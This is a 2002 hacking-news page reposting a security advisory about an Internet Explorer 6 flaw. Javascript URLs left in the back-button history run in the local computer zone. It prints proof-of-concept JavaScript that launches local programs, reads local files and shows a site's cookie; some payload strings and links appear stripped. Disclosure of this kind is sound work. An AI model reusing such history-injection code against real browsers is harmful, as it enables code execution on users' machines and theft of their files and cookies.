Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Using the backbutton in IE is dangerous

Using the backbutton in IE is dangerous

by Nikola Strahija on April 15th, 2002 IE allows urls containing the javascript protocoll in the history list. Code injected in the url will operate in the same zone/domain as the last url viewed. The javascript url can be set to trigger when a user presses the backbutton.


The normal behaviour when a page fails to load is to press the backbutton.
The error page shown by IE is operating in the local computer zone
(res://C:WINNTSystem32shdoclc.dll/dnserror.htm# on Win2000). Thus, we
can execute code and read local files.


EXPLOIT:
========
The exploit works as follow: Press one of the links and then the back
button.

Note: Exploit has only been tested on fully patched IE 6.0, with Win XP
and Win2000 pro (assume other OS are also vulnerable). Winmine.exe and
test.txt must exist.

--------------------------CUT HERE-------------------------------

Press link and then the backbutton to trigger script.

Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)


Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)


Read c:test.txt (needs to be created)


Read Google cookie



// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
function execFile(file){
s = '';
backBug(badUrl,s);
}
function readFile(file){
s = '';
backBug(badUrl,s);
}
function readCookie(url){
s = 'alert(document.cookie);close();';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(""+payload+"")')";
s+= ";history.back();} else 'location=""+url
s+= "";document.title=""+page+"";';";
location = s;
}


--------------------------CUT HERE-------------------------------


Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »